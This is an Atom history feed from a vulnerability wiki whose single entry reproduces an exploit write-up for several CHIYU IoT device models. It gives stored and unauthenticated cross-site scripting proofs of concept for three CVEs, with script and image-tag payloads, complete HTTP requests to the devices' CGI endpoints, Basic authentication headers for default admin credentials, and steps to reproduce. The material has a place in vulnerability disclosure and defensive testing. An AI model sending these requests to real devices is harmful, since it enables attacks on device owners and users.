<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CHIYU_IoT_devices_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>CHIYU IoT devices XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CHIYU_IoT_devices_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CHIYU_IoT_devices_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T13:23:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CHIYU_IoT_devices_XSS%E6%BC%8F%E6%B4%9E&amp;diff=3886&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==XSS== &lt;pre&gt; # Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.c...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CHIYU_IoT_devices_XSS%E6%BC%8F%E6%B4%9E&amp;diff=3886&amp;oldid=prev"/>
		<updated>2021-06-02T01:12:47Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==XSS== &amp;lt;pre&amp;gt; # Exploit Title: CHIYU IoT devices - &amp;#039;Multiple&amp;#039; Cross-Site Scripting (XSS) # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.c...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)&lt;br /&gt;
# Date: May 31 2021&lt;br /&gt;
# Exploit Author: sirpedrotavares&lt;br /&gt;
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html&lt;br /&gt;
# Software Link: https://www.chiyu-tech.com/category-hardware.html&lt;br /&gt;
# Version: BF-430,  BF-431,  BF-450M,  BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions &amp;lt; June 2021&lt;br /&gt;
# Tested on: BF-430,  BF-431,  BF-450M,  BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC&lt;br /&gt;
# CVE:  CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643&lt;br /&gt;
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks&lt;br /&gt;
&lt;br /&gt;
Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.&lt;br /&gt;
&lt;br /&gt;
#1:  Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices&lt;br /&gt;
CVE ID: CVE-2021-31250&lt;br /&gt;
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N&lt;br /&gt;
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250&lt;br /&gt;
&lt;br /&gt;
============= PoC 01 ===============&lt;br /&gt;
Affected parameter: TF_submask&lt;br /&gt;
Component: if.cgi&lt;br /&gt;
Payload: &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
HTTP Request:&lt;br /&gt;
GET&lt;br /&gt;
/if.cgi?redirect=setting.htm&amp;amp;failure=fail.htm&amp;amp;type=ap_tcps_apply&amp;amp;TF_ip=443&amp;amp;TF_submask=0&amp;amp;TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&amp;amp;radio_ping_block=0&amp;amp;max_tcp=3&amp;amp;B_apply=APPLY&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 192.168.187.12&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: http://192.168.187.12/ap_tcps.htm&lt;br /&gt;
Authorization: Basic OmFkbWlu&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to component mentioned (if.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (TF_submask)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
  ============= PoC 02 ===============&lt;br /&gt;
Affected parameter: TF_hostname=Component: dhcpc.cgi&lt;br /&gt;
Payload: /&amp;quot;&amp;gt;&amp;lt;img src=&amp;quot;#&amp;quot;&amp;gt;&lt;br /&gt;
HTTP request and response:&lt;br /&gt;
&lt;br /&gt;
HTTP Request:&lt;br /&gt;
GET&lt;br /&gt;
/dhcpc.cgi?redirect=setting.htm&amp;amp;failure=fail.htm&amp;amp;type=dhcpc_apply&amp;amp;TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&amp;amp;S_type=2&amp;amp;S_baud=3&amp;amp;S_userdefine=0&amp;amp;AP_type=0&amp;amp;TF_port=443&amp;amp;TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&amp;amp;B_apply=APPLY&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 192.168.187.12&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: http://192.168.187.12/wan_dc.htm&lt;br /&gt;
Authorization: Basic OmFkbWlu&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to component mentioned (dhcpc.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (TF_hostname)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
  ============= PoC 03 ===============&lt;br /&gt;
Affected parameter: TF_servicename=Component: ppp.cgi&lt;br /&gt;
Payload: &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
GET&lt;br /&gt;
/ppp.cgi?redirect=setting.htm&amp;amp;failure=fail.htm&amp;amp;type=ppp_apply&amp;amp;TF_username=admin&amp;amp;TF_password=admin&amp;amp;TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&amp;amp;TF_idletime=0&amp;amp;L_ipnego=DISABLE&amp;amp;TF_fixip1=&amp;amp;TF_fixip2=&amp;amp;TF_fixip3=&amp;amp;TF_fixip4=&amp;amp;S_type=2&amp;amp;S_baud=3&amp;amp;S_userdefine=0&amp;amp;AP_type=0&amp;amp;TF_port=443&amp;amp;TF_remoteip1=0.0.0.0&amp;amp;B_apply=APPLY&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 192.168.187.143&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: http://192.168.187.143/wan_pe.htm&lt;br /&gt;
Authorization: Basic OmFkbWlu&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to component mentioned (ppp.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter&lt;br /&gt;
(TF_servicename)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
============= PoC 04 ===============&lt;br /&gt;
Affected parameter: TF_port=Component: man.cgi&lt;br /&gt;
Payload: /&amp;quot;&amp;gt;&amp;lt;img src=&amp;quot;#&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
GET&lt;br /&gt;
/man.cgi?redirect=setting.htm&amp;amp;failure=fail.htm&amp;amp;type=dev_name_apply&amp;amp;http_block=0&amp;amp;TF_ip0=192&amp;amp;TF_ip1=168&amp;amp;TF_ip2=200&amp;amp;TF_ip3=200&amp;amp;TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&amp;amp;TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&amp;amp;B_mac_apply=APPLY&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 192.168.187.12&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101&lt;br /&gt;
Firefox/68.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Referer: http://192.168.187.12/manage.htm&lt;br /&gt;
Authorization: Basic OmFkbWlu&lt;br /&gt;
Connection: close&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to component mentioned (man.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (TF_port)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#2:  Unauthenticated XSS in several CHIYU IoT devices&lt;br /&gt;
CVE ID: CVE-2021-31641&lt;br /&gt;
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N&lt;br /&gt;
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Component: any argument passed via URL that results in an HTTP-404&lt;br /&gt;
Payload: http://ip/&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the webpage of the vulnerable device&lt;br /&gt;
  2. On the web-browsers, you need to append the payload after the IP&lt;br /&gt;
address (see payload above)&lt;br /&gt;
  3. Submit the request and observe payload execution&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#3:  Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices&lt;br /&gt;
CVE ID: CVE-2021-31643&lt;br /&gt;
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N&lt;br /&gt;
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643&lt;br /&gt;
&lt;br /&gt;
Affected parameter: username=&lt;br /&gt;
Component: if.cgi&lt;br /&gt;
Payload: &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
HTTP request - SEMAC Web Ver7.2&lt;br /&gt;
&lt;br /&gt;
GET&lt;br /&gt;
/if.cgi?redirect=EmpRcd.htm&amp;amp;failure=fail.htm&amp;amp;type=user_data&amp;amp;creg=0&amp;amp;num=&amp;amp;EmployeeID=0000&amp;amp;MarkID=0000&amp;amp;CardID=000000&amp;amp;username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;amp;Card_Valid=0&amp;amp;SY=2021&amp;amp;SM=2&amp;amp;SD=7&amp;amp;sy_h=16&amp;amp;sy_m=23&amp;amp;EY=2021&amp;amp;EM=2&amp;amp;ED=7&amp;amp;sy_h=16&amp;amp;sy_m=23&amp;amp;Activate=5&amp;amp;Usertype=0&amp;amp;group_list1=1&amp;amp;group_list2=0&amp;amp;group_list3=0&amp;amp;group_list4=0&amp;amp;Verify=1&amp;amp;Password=&amp;amp;Retype=&amp;amp;card=0&amp;amp;card=0&amp;amp;card=0&amp;amp;card=0&amp;amp;card=0&amp;amp;card=116&amp;amp;card=9&amp;amp;card=138&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 127.0.0.1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)&lt;br /&gt;
Gecko/20100101 Firefox/87.0&lt;br /&gt;
Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Authorization: Basic YWRtaW46YWRtaW4=&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://127.0.0.1/EmpRcd.htm&lt;br /&gt;
Cookie: fresh=; remote=00000000&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
HTTP request - BIOSENSE-III-COMBO(M1)(20000)&lt;br /&gt;
&lt;br /&gt;
GET&lt;br /&gt;
/if.cgi?redirect=EmpRcd.htm&amp;amp;failure=fail.htm&amp;amp;type=user_data&amp;amp;creg=0&amp;amp;num=&amp;amp;EmployeeID=3&amp;amp;MarkID=3474&amp;amp;CardID=00000000&amp;amp;emp_id=&amp;amp;username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;amp;Card_Valid=0&amp;amp;SY=2019&amp;amp;SM=11&amp;amp;SD=25&amp;amp;sy_h=15&amp;amp;sy_m=0&amp;amp;EY=2019&amp;amp;EM=11&amp;amp;ED=25&amp;amp;sy_h=15&amp;amp;sy_m=0&amp;amp;Activate=5&amp;amp;Usertype=0&amp;amp;group_list1=1&amp;amp;group_list2=0&amp;amp;group_list3=0&amp;amp;group_list4=0&amp;amp;Verify=1&amp;amp;Password=&amp;amp;Retype=&amp;amp;card=0&amp;amp;card=0&amp;amp;card=0&amp;amp;card=0&amp;amp;card=118&amp;amp;card=5&amp;amp;card=101&amp;amp;card=110&lt;br /&gt;
HTTP/1.1&lt;br /&gt;
Host: 127.0.0.1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)&lt;br /&gt;
Gecko/20100101 Firefox/87.0&lt;br /&gt;
Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Authorization: Basic YWRtaW46YWRtaW4=&lt;br /&gt;
Connection: close&lt;br /&gt;
Referer: http://127.0.0.1/EmpRcd.htm&lt;br /&gt;
Cookie: fresh=&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Steps to reproduce:&lt;br /&gt;
  1. Navigate to the vulnerable device&lt;br /&gt;
  2. Make a GET request to component mentioned (if.cgi)&lt;br /&gt;
  3. Append the payload at the end of the vulnerable parameter (username)&lt;br /&gt;
  4. Submit the request and observe payload execution&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>